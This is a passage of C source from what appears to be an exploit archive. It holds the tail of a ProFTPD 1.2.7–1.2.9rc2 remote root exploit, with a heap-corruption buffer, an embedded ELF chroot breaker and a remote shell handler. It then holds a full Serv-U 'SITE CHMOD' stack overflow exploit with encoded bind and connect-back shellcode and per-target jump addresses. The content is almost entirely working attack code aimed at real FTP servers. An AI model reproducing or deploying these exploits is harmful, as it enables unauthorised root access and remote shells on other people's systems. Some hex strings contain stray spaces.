return FAILURE;
FD_ZERO(&fdset);
FD_SET(s, &fdset);
if((result=select(s+1, &fdset, 0, 0, &timeout))==0)
return FAILURE;
return accept(s,sa,f);
}
int set_passive_mode(int mode)
{
int portMSB, portLSB;
int x1,x2,x3,x4;
char *ptr=localIP, *start;
status_bar("Setting passive");
if(mode==DOWNLOAD) {
if((++currentPassivePort) > 35000)
currentPassivePort=32789;
while(*(++ptr))
if(*ptr=='.')
*ptr=',';
portMSB=(currentPassivePort >> 8 ) & 0xff;
portLSB=currentPassivePort & 0xff;
my_send(controlSock, "PORT %s,%d,%d\r\n", localIP, portMSB, portLSB);
my_recv(controlSock);
return check_status();
} else {
my_send(controlSock, "PASV\r\n");
my_recv(controlSock);
if(check_status()==FAILURE)
return FAILURE;
ptr=serverBuf;
while(*ptr && *ptr!='(')
ptr++;
if(*ptr=='\0')
return FAILURE;
start=ptr+1;
while(*ptr && *ptr!=')')
ptr++;
*ptr=0;
sscanf(start, "%d,%d,%d,%d,%d,%d",&x1, &x2, &x3, &x4, &portMSB, &portLSB);
currentServerPort=(portMSB << 8) | portLSB;
}
return SUCCESS;
}
int connect_to_server(int port)
{
struct sockaddr_in serverAddr;
struct hostent *host;
int sock, tmp=1;
status_bar("Connecting");
if((host=gethostbyname(server))==NULL)
return FAILURE;
if((sock=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))<0)
return FAILURE;
bzero(&serverAddr,sizeof(struct sockaddr));
serverAddr.sin_family=AF_INET;
serverAddr.sin_port=htons(port);
serverAddr.sin_addr=*((struct in_addr *)host->h_addr);
setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (void *)&tmp, sizeof(tmp));
if(connect(sock,(struct sockaddr *)&serverAddr,sizeof(struct sockaddr))<0) {
close(sock);
return FAILURE;
}
return sock;
}
int check_status()
{
if(isdigit(serverBuf[0]) && serverBuf[0]!='5')
return SUCCESS;
else
return FAILURE;
}
int login_to_server()
{
status_bar("Logging in");
my_recv(controlSock);
my_send(controlSock, "USER %s\r\n", user);
my_recv(controlSock);
if(check_status()==FAILURE)
return FAILURE;
my_send(controlSock, "PASS %s\r\n", pass);
my_recv(controlSock);
return check_status();
}
int set_ascii_mode()
{
status_bar("Setting ASCII mode");
my_send(controlSock, "TYPE A\r\n");
my_recv(controlSock);
return check_status();
}
int upload_file()
{
int dataSock;
status_bar("Uploading file");
// open up the data channel
if((dataSock=connect_to_server(currentServerPort)) ==FAILURE)
return FAILURE;
// tell server we're gonna send some shiznitz
my_send(controlSock, "STOR %s\r\n", filename);
my_recv(controlSock);
if(check_status()==FAILURE) {
close(dataSock);
return FAILURE;
}
// send the exploit file to the victim server
send(dataSock, exploitBuf, exploitBufLen, 0);
close(dataSock);
// make sure all went well
my_recv(controlSock);
if(check_status()==FAILURE)
return FAILURE;
return SUCCESS;
}
int create_exploit_buffer()
{
int i;
char buf[41];
unsigned int writeaddr=stackWriteAddr;
unsigned int *ptr=(unsigned int *)(exploitBuf+3);
unsigned int dummy=0x11111111;
FILE *fp;
status_bar("Make exploit buf");
exploitBufLen=1024;
memset(exploitBuf,0,EXPLOIT_BUF_SIZE);
memset(exploitBuf,0x90,512);
*(ptr++)=writeaddr+28;
for(i=0;i<6;i++)
*(ptr++)=retAddr;
*(ptr++)=0;
for(i=0;i<2;i++)
*(ptr++)=retAddr;
memcpy(exploitBuf+512-strlen(shellcode)-1,shellcode,strlen(shellcode));
memset(exploitBuf+512,'\n',512);
for(i=0;i<96;i++) {
memset(buf,0,41);
if(dummy==0x1111112e)
// this sets session.d->outstrm to NULL which forces an early return
// avoids crashing proftpd... on SuSE 8.0 anywayz...
memcpy(buf,"\n\n\n\n\n\n\n\n\x00\x00\x00\x00\n\n\n\n\n\n\n\n",20);
else if(dummy==0x11111166)
// this is the same thing tailored for RH7.2
memcpy(buf,"\n\n\n\n\n\n\n\n\x72\x00\x00\x00\x00\n\n\n\n\n\n\n",20);
else
memset(buf,'\n',20);
// i used these dummy values to find the correct spot for
// the session.d->outstrm pointer
*(unsigned int *)(buf+20)=dummy;
*(unsigned int *)(buf+24)=dummy;
*(unsigned int *)(buf+28)=dummy;
// this will become the address of an available chunk of memory
// that is returned by new_block() in pool.c
*(unsigned int *)(buf+32)=writeaddr;
// this is what will be returned by palloc() in pool.c
// palloc() is the function that calls new_block() and
// provides the allocation interface for the pools system.
*(unsigned int *)(buf+36)=writeaddr;
memcpy(exploitBuf+exploitBufLen,buf,40);
exploitBufLen+=40;
dummy++;
}
return SUCCESS;
}
int create_passive_server()
{
struct sockaddr_in serverAddr;
int on=1,sock;
status_bar("Creating server");
sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
memset(&serverAddr,0,sizeof(struct sockaddr_in));
serverAddr.sin_port=htons(currentPassivePort);
serverAddr.sin_family=AF_INET;
serverAddr.sin_addr.s_addr=htonl(INADDR_ANY);
setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on));
if(bind(sock,(struct sockaddr *)&serverAddr,sizeof(struct sockaddr))<0) {
close(sock);
return FAILURE;
}
if(listen(sock,5)<0) {
close(sock);
return FAILURE;
}
return sock;
}
void usage(char *exploitName)
{
printf("proftpd 1.2.7 - 1.2.9rc2 remote root exploit\n");
printf(" based on code by bkbll ([email protected])\n");
printf(" by Haggis ([email protected])\n");
printf("--------------------------------------------------------------\n");
printf("Usage: %s -t host -l ip [options]\n",exploitName);
printf("Arguments:\n");
printf(" -t <host> host to attack\n");
printf(" -u <username> [anonymous]\n");
printf(" -p <password> [[email protected]]\n");
printf(" -l <local ip address> interface to bind to\n");
printf(" -s sleep for 10secs to allow GDB attach\n");
printf(" -U <path> specify upload path, eg. /incoming\n");
printf(" -P <port> port number of remote proftpd server\n");
printf(" -S <address> start at <address> when bruteforcing\n");
exit(0);
}
int do_remote_shell(int shellSock)
{
fd_set rfds;
char buf[1024];
int retval, r=1;
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(shellSock, &rfds);
retval=select(shellSock+1, &rfds, NULL, NULL, NULL);
if(retval) {
if(FD_ISSET(shellSock, &rfds)) {
buf[(r=recv(shellSock, buf, sizeof(buf)-1,0))]='\0'; // lol
printf("%s", buf);fflush(stdout);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, sizeof(buf)-1))]='\0'; // lmfao
send(shellSock, buf, strlen(buf), 0);
}
}
} while(retval && r); // loop until connection terminates
return SUCCESS;
}
int check_for_linefeed()
{
char *ptr=(char *)&stackWriteAddr;
int i=4;
for(;i;i--)
if(*(ptr++)=='\n')
return FAILURE;
return SUCCESS;
}
// Handy little function to send formattable data down a socket.
void my_send(int s, char *b, ...) {
va_list ap;
char *buf;
my_sleep(SLEEP_DELAY);
va_start(ap,b);
vasprintf(&buf,b,ap);
send(s,buf,strlen(buf),0);
va_end(ap);
free(buf);
}
// Another handy function to read data from a socket.
void my_recv(int s) {
int len;
my_sleep(SLEEP_DELAY);
memset(serverBuf, 0, SIZE);
len=recv(s, serverBuf, SIZE-1, 0);
serverBuf[len]=0;
}
void doris_chroot_breaker() {
char haggis_magic_buffer[]=
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x02\x00\x03\x00\x01\x00\x00\x00\x80\x80\x04\x08\x 34\x00\x00\x00"
"\xa0\x01\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x 02\x00\x28\x00"
"\x09\x00\x08\x00\x01\x00\x00\x00\x00\x00\x00\x00\x 00\x80\x04\x08"
"\x00\x80\x04\x08\x20\x01\x00\x00\x20\x01\x00\x00\x 05\x00\x00\x00"
"\x00\x10\x00\x00\x01\x00\x00\x00\x20\x01\x00\x00\x 20\x91\x04\x08"
"\x20\x91\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x 06\x00\x00\x00"
"\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x55\x89\xe5\x83\xec\x6c\x57\x56\x53\x8d\x45\xa0\x 8d\x7d\xa0\xbe"
"\xc0\x80\x04\x08\xfc\xb9\x17\x00\x00\x00\xf3\xa5\x 66\xa5\xa4\x8d"
"\x45\xa0\x89\x45\x9c\x8b\x5d\x9c\xff\xd3\x8d\x65\x 88\x5b\x5e\x5f"
"\x89\xec\x5d\xc3\x8d\xb6\x00\x00\x00\x00\x8d\xbf\x 00\x00\x00\x00"
"\x31\xc0\x31\xdb\x40\x50\x89\xe1\x66\xbb\x73\x68\x 53\x89\xe3\xb0"
"\x27\xcd\x80\x31\xc0\x89\xe3\xb0\x3d\xcd\x80\x31\x c9\xb1\x0a\x31"
"\xc0\x31\xdb\x66\xbb\x2e\x2e\x53\x89\xe3\xb0\x0c\x cd\x80\x49\x85"
"\xc9\x75\xec\x31\xc0\x31\xdb\xb3\x2e\x53\x89\xe3\x b0\x3d\xcd\x80"
"\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x 6e\x89\xe3\x52"
"\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80\x31\xc0\x40\x cd\x80\x00\x00"
"\x00\x47\x43\x43\x3a\x20\x28\x47\x4e\x55\x29\x20\x 32\x2e\x39\x35"
"\x2e\x33\x20\x32\x30\x30\x31\x30\x33\x31\x35\x20\x 28\x53\x75\x53"
"\x45\x29\x00\x08\x00\x00\x00\x00\x00\x00\x00\x01\x 00\x00\x00\x30"
"\x31\x2e\x30\x31\x00\x00\x00\x00\x2e\x73\x79\x6d\x 74\x61\x62\x00"
"\x2e\x73\x74\x72\x74\x61\x62\x00\x2e\x73\x68\x73\x 74\x72\x74\x61"
"\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x 61\x74\x61\x00"
"\x2e\x64\x61\x74\x61\x00\x2e\x73\x62\x73\x73\x00\x 2e\x62\x73\x73"
"\x00\x2e\x63\x6f\x6d\x6d\x65\x6e\x74\x00\x2e\x6e\x 6f\x74\x65\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00\x 01\x00\x00\x00"
"\x06\x00\x00\x00\x80\x80\x04\x08\x80\x00\x00\x00\x 40\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x 00\x00\x00\x00"
"\x21\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x c0\x80\x04\x08"
"\xc0\x00\x00\x00\x60\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x20\x00\x00\x00\x00\x00\x00\x00\x29\x00\x00\x00\x 01\x00\x00\x00"
"\x03\x00\x00\x00\x20\x91\x04\x08\x20\x01\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x 00\x00\x00\x00"
"\x2f\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x 20\x91\x04\x08"
"\x20\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x 08\x00\x00\x00"
"\x03\x00\x00\x00\x20\x91\x04\x08\x20\x01\x00\x00\x 00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x 00\x00\x00\x00"
"\x3a\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x20\x01\x00\x00\x23\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x43\x00\x00\x00\x 07\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x43\x01\x00\x00\x 14\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x 00\x00\x00\x00"
"\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x57\x01\x00\x00\x49\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00";
strcpy(filename, "aa");
memset(exploitBuf,0,777);
memcpy(exploitBuf, haggis_magic_buffer, 776);
exploitBufLen=776;
if((controlSock=connect_to_server(ftpPort))==FAILU RE) {
printf("\nCould not connect to target server\n");
exit(1);
}
login_to_server();
my_send(controlSock, "MKD incoming\r\n");
my_recv(controlSock);
my_send(controlSock, "SITE CHMOD 777 incoming\r\n");
my_recv(controlSock);
my_send(controlSock, "CWD incoming\r\n");
my_recv(controlSock);
set_passive_mode(UPLOAD);
upload_file();
my_send(controlSock, "SITE CHMOD 777 aa\r\n");
close(controlSock);
}
// Wrapper for nanosleep()... just pass 'n' nanoseconds to it.
void my_sleep(int n) {
struct timespec t;
t.tv_sec=0;
t.tv_nsec=n;
nanosleep(&t,&t);
}
// [2003-10-13]
21 Serv-U FTPD 3.x/4.x "SITE CHMOD" Command Remote Exploit
/*
*-----------------------------------------------------------------------
*
* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author : lion
* : [email protected]
* : http://www.cnhonker.com
* Date : 2004-01-25
* : 2004-01-25 v1.0 Can attack Serv-U v3.0.0.20~v4.1.0.11
* Tested : Windows 2000 Server EN/GB
* : + Serv-U v3.0.0.20~v4.1.0.11
* Notice : *** Bug find by kkqq [email protected] ***
* : *** You need a valid account and a writable directory. ***
* Complie : cl Servu.c
* Usage : Servu <-i ip> <-t type> [-u user] [-p pass] [-d dir] [-f ftpport] [-c cbhost] [-s shellport]
*------------------------------------------------------------------------
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ws2_32")
// for bind shellcode
#define BIND_OFFSET 91
// for connectback shellcode
#define PORT_OFFSET 95
#define IP_OFFSET 88
#define SEH_OFFSET 0x193 //v3.0.0.20~v4.1.0.11
//#define SEH_OFFSET 0x133 // work on v3.0.0.16~v3.0.0.19, for connectback shellcode
#define MAX_LEN 2048
#define JMP_OVER "\xeb\x06\xeb\x06"
#define VERSION "1.0"
struct
{
DWORD dwJMP;
char *szDescription;
}targets[] =
{
{0x7ffa4a1b,"Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP ALL"}, //for all GB win2000 and winxp
// {0x74FD69A9,"Serv-U v3.0.0.20~v4.1.0.11 GB 2K SP3/SP4"}, //wsock32.dll jmp ebx addr
// {0x71a469ad,"Serv-U v3.0.0.20~v4.1.0.11 GB XP SP0/SP1"}, //wsock32.dll jmp ebx addr
// {0x77e45f17,"Serv-U v3.0.0.20~v4.1.0.11 GB/BG 2K SP4"}, //user32.dll jmp ebx addr
// {0x7ffa2186,"Serv-U v3.0.0.20~v4.1.0.11 BG 2K/XP ALL"}, //for all BG win2000 and winxp
// {0x6dec6713,"Serv-U v3.0.0.20~v4.1.0.11 BG 2K SP4"}, //setupapi.dll jmp ebx addr
// {0x6DEE6713,"Serv-U v3.0.0.20~v4.1.0.11 KR 2K SP4"}, //setupapi.dll jmp ebx addr
// {0x77886713,"Serv-U v3.0.0.20~v4.1.0.11 EN 2K SP4"}, //setupapi.dll jmp ebx addr
// {0x76b42a3a,"Serv-U v3.0.0.20~v4.1.0.11 EN XP SP1"},
// {0x12345678,"Serv-U v3.0.0.20~v4.1.0.11"},
},v;
unsigned char *szSend[4];
unsigned char szCommand[MAX_LEN];
char szDirectory[0x100];
// 28 bytes decode by lion, don't change this.
unsigned char decode[]=
"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x 43\x39\x3B\x75"
"\xFB\x4B\x80\x33\x93\x39\x73\xFC\x75\xF7\xFF\xD3";
// Shellcode start sign, use for decode, don't change this.
unsigned char sc_start[]=
"lion";
// Shellcode end sign, use for decode, don't change this.
unsigned char sc_end[]=
"li0n";
// 311 bytes bind shellcode by lion (xor with 0x93)
unsigned char sc[]=
"\x7A\x96\x92\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x 18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x 36\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\x C7\x6C\x85\x18"
"\x7B\xF9\x95\xCA\x7B\x1F\x93\x93\x93\x71\x6A\x12\x 7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\x C3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\x54\x94\x91\x93\x93\x A6\xA0\x53\x1A"
"\xD4\x97\xF9\x83\xC4\xC0\x6C\xC5\x8B\xF9\x92\xC0\x 6C\xC5\x8F\xC3"
"\xC3\xC0\x6C\xC5\xB3\x18\x4B\xA0\x53\xFB\xF0\xFE\x F7\x93\x1A\xF5"
"\xA3\x10\x7F\xC7\x18\x6F\xF9\x87\xCA\x1A\x97\x1C\x 71\x68\x55\xD4"
"\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A\xCC\xDB\x1A\x CC\xDF\x1A\xCC"
"\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2\xC2\xF9\x92\x C2\xC2\x6C\xE5"
"\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C\x6C\xA2\x6C\x C5\x9B\xC0\x6C"
"\xC5\xB7\x6C\xC5\x9F\xC2\xC5\x18\xE6\xAF\x18\xE7\x BD\xEB\x90\x66"
"\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA\xD2\x3E\x90\x 56\xA0\x48\x9C"
"\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E\x90\x49\xD3\x 78\x62\xA8\x8C"
"\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5\x18\x9F\xD8\x 18\xCD\x8F\x90"
"\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA\x50\x7B\x65\x 6D\x6C\x6C\x1D"
"\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A\x96\x5D\xED\x 4B\x71\xE0\x58"
"\x7E\x6F\xA8\x4A\x9A\x66\x3E\x37\x89\xE3\x54\x37\x 3E\xBD\x7A\x76"
"\xDA\x15\xDA\x74\xEA\x55\xEA";
// 294 bytes connectback shellcode by lion (xor with 0x93)
unsigned char cbsc[]=
"\x7A\x6F\x93\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x 18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x 0F\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\x C7\x6C\x85\x18"
"\x7B\xF9\x97\xCA\x7B\x10\x93\x93\x93\x71\x6A\x12\x 7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\x C3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\xFB\xEC\x93\x93\x92\x FB\x91\x93\x93"
"\xA6\x18\x5F\xF9\x83\xC2\xC0\x6C\xC5\x8B\x16\x53\x E6\xD8\xA0\x53"
"\xFB\xF0\xFE\xF7\x93\x1A\xF5\xA3\x10\x7F\xC7\x18\x 6F\xF9\x83\xCA"
"\x1A\x97\x1C\x71\x68\x55\xD4\x83\xD7\x6D\xD4\xAF\x 6D\xD4\xAE\x1A"
"\xCC\xDB\x1A\xCC\xDF\x1A\xCC\xC3\x1E\xD7\xB7\x83\x C4\xC3\xC2\xC2"
"\xC2\xF9\x92\xC2\xC2\x6C\xE5\xA3\xC2\x6C\xC5\x97\x 18\x5F\xF9\x6C"
"\x6C\xA2\x6C\xC5\x9B\xC0\x6C\xC5\x8F\x6C\xC5\x9F\x C2\xC5\x18\xE6"
"\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x 66\xA0\x5A\xDA"
"\xD2\x3E\x90\x56\xA0\x48\x9C\x2D\x83\xA9\x45\xE7\x 9B\x52\x58\x9E"
"\x90\x49\xD3\x78\x62\xA8\x8C\xE6\x74\xCD\x18\xCD\x B7\x90\x4E\xF5"
"\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x 56\x38\xCD\xCA"
"\x50\x7B\x6C\x6D\x6C\x6C\x1D\xDD\x9D\x7F\xE1\x6D\x 20\x85\x3E\x4A"
"\x96\x5D\xED\x4B\x71\xE0\x58\x7E\x6F\xA8\x4A\x9A\x 66\x3E\x7F\x6A"
"\x39\xF3\x74\xEA\x55\xEA";
void usage(char *p)
{
int i;
printf( "Usage:\t%s\t<-i ip> <-t type>\n"
"\t\t[-u user] [-p pass] [-d dir]\n"
"\t\t[-f ftpport] [-c cbhost] [-s shellport]\n\n"
"[type]:\n" , p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("\t%d\t0x%x\t%s\n", i, targets[i].dwJMP, targets[i].szDescription);
}
}
/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
}
}
}
void main(int argc, char **argv)
{
struct sockaddr_in sa, server, client;
WSADATA wsd;
SOCKET s, s2, s3;
int iErr, ret, len;
char szRecvBuff[MAX_LEN];
int i, j, iType;
int iPort=21;
char *ip=NULL, *pUser="ftp", *pPass="[email protected]", *cbHost=NULL;
char user[128], pass[128];
BOOL bCb=FALSE, bLocal=TRUE;
unsigned short shport=53, shport2=0;
unsigned long cbip;
unsigned int timeout=5000, Reuse;
char penetrate[255],cbHost2[20];
int seh_offset;
printf( "Serv-U FTPD 3.x/4.x \"SITE CHMOD\" remote overflow exploit V%s\r\n"
"Bug find by kkqq [email protected], Code By lion ([email protected])\r\n"
"Welcome to HUC website http://www.cnhonker.com\r\n\n"
, VERSION);
seh_offset = SEH_OFFSET;
if(argc < 4)
{
usage(argv[0]);
return;
}
for(i=1;i<argc;i+=2)
{
if(strlen(argv[i]) != 2)
{
usage(argv[0]);
return;
}
// check parameter
if(i == argc-1)
{
usage(argv[0]);
return;
}
switch(argv[i][1])
{
case 'i':
ip=argv[i+1];
break;
case 't':
iType = atoi(argv[i+1]);
break;
case 'f':
iPort=atoi(argv[i+1]);
break;
case 'p':
pPass = argv[i+1];
break;
case 'u':
pUser=argv[i+1];
break;
case 'c':
cbHost=argv[i+1];
bCb=TRUE;
break;
case 's':
shport=atoi(argv[i+1]);
break;
case 'd':
if(argv[i+1][0] != '/')
strcpy(szDirectory, "/");
strncat(szDirectory, argv[i+1], sizeof(szDirectory)-0x20);
if(szDirectory[strlen(szDirectory)-1] != '/')
strcat(szDirectory, "/");
// correct the directory len
for(j=0;j<(strlen(szDirectory)-1)%8;j++)
strcat(szDirectory, "x");
//printf("%d:%s\r\n", strlen(szDirectory), szDirectory);
seh_offset = seh_offset - strlen(szDirectory)+1;
break;
}
}
if((!ip) || (!user) || (!pass))
{
usage(argv[0]);
printf("[-] Invalid parameter.\n");
return;
}
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return;
}
if(iPort <0 || iPort >65535 || shport <0 || shport > 65535)
{
usage(argv[0]);
printf("[-] Invalid port.\n");
return;
}
_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
user[sizeof(user)-1]='\0';
_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
pass[sizeof(pass)-1]='\0';
szSend[0] = user; //user
szSend[1] = pass; //pass
szSend[2] = penetrate; //pentrate
szSend[3] = szCommand; //shellcode
// Penetrate through the firewall.
if(bCb && shport > 1024)
{
strncpy(cbHost2, cbHost, 20);
for(i=0;i<strlen(cbHost); i++)
{
if(cbHost[i] == '.')
cbHost2[i] = ',';
}
sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);
//printf("%s", penetrate);
}
else
{
sprintf(penetrate,"TYPE I\r\n");
}
// fill the "site chmod" command
strcpy(szCommand, "site chmod 777 ");
// fill the directory
if(szDirectory[0])
strcat(szCommand, szDirectory);
// fill the egg
for(i=0;i<seh_offset%8;i++)
strcat(szCommand, "\x90");
//strcat(szCommand, "BBBB");
// fill the seh
for(i=0;i<=(seh_offset/8)*8+0x20;i+=8)
{
strcat(szCommand, JMP_OVER);
memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
}
// fill the decode
strcat(szCommand, decode);
// fill the shellcode start sign
strcat(szCommand, sc_start);
// fill the shellcode
if(bCb)
{
// connectback shellcode
shport2 = htons(shport)^(u_short)0x9393;
cbip = inet_addr(cbHost)^0x93939393;
memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
memcpy(&cbsc[IP_OFFSET], &cbip, 4);
strcat(szCommand, cbsc);
}
else
{
// bind shellcode
shport2 = htons(shport)^(u_short)0x9393;
memcpy(&sc[BIND_OFFSET], &shport2, 2);
strcat(szCommand, sc);
}
// fill the shellcode end sign
strcat(szCommand, sc_end);
// send end
strcat(szCommand, "\r\n");
if(strlen(szCommand) >= sizeof(szCommand))
{
printf("[-] stack buffer overflow.\n");
return;
}
// printf("send size %d:%s", strlen(szCommand), szCommand);
__try
{
if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
__leave;
}
s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(s == INVALID_SOCKET)
{
printf("[-] Create socket failed:%d",GetLastError());
__leave;
}
sa.sin_family=AF_INET;
sa.sin_port=htons((USHORT)iPort);
sa.sin_addr.S_un.S_addr=inet_addr(ip);
setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
if(iErr == SOCKET_ERROR)
{
printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
__leave;
}
printf("[+] Connect to %s:%d success.\n", ip, iPort);
if(bCb)
{
Sleep(500);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family=AF_INET;
server.sin_addr.S_un.S_addr=inet_addr(cbHost);
//server.sin_addr.s_addr=INADDR_ANY;
server.sin_port=htons((unsigned short)shport);
setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
Reuse = 1;
setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));
if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
{
printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
printf("[-] You must run nc get the shell.\n");
bLocal = FALSE;
//closesocket(s2);
//__leave;
}
else
{
printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
listen(s2, 1);
}
}
for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
{
memset(szRecvBuff, 0, sizeof(szRecvBuff));
iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
__leave;
}
printf("[+] Recv: %s", szRecvBuff);
if(szRecvBuff[0] == '5')
{
printf("[-] Server return a error Message.\r\n");
__leave;
}
iErr = send(s, szSend[i], strlen(szSend[i]),0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Send buffer error:%d.\n", WSAGetLastError());
__leave;
}
if(i==sizeof(szSend)/sizeof(szSend[0])-1)
printf("[+] Send shellcode %d bytes.\n", iErr);
else
printf("[+] Send: %s", szSend[i]);
}
printf("[+] If you don't have a shell it didn't work.\n");
if(bCb)
{
if(bLocal)
{
printf("[+] Wait for shell...\n");
len = sizeof(client);
s3 = accept(s2, (struct sockaddr*)&client, &len);
if(s3 != INVALID_SOCKET)
{
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s3);
}
}
}
else
{
printf("[+] Connect to shell...\n");
Sleep(1000);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(shport);
server.sin_addr.s_addr=inet_addr(ip);
ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
if(ret!=0)
{
printf("[-] Exploit seem failed.\n");
__leave;
}
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s2);
}
}
__finally
{
if(s != INVALID_SOCKET) closesocket(s);
if(s2 != INVALID_SOCKET) closesocket(s2);
if(s3 != INVALID_SOCKET) closesocket(s3);
WSACleanup();
}
return;
}
// [2004-01-27]
21 Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit
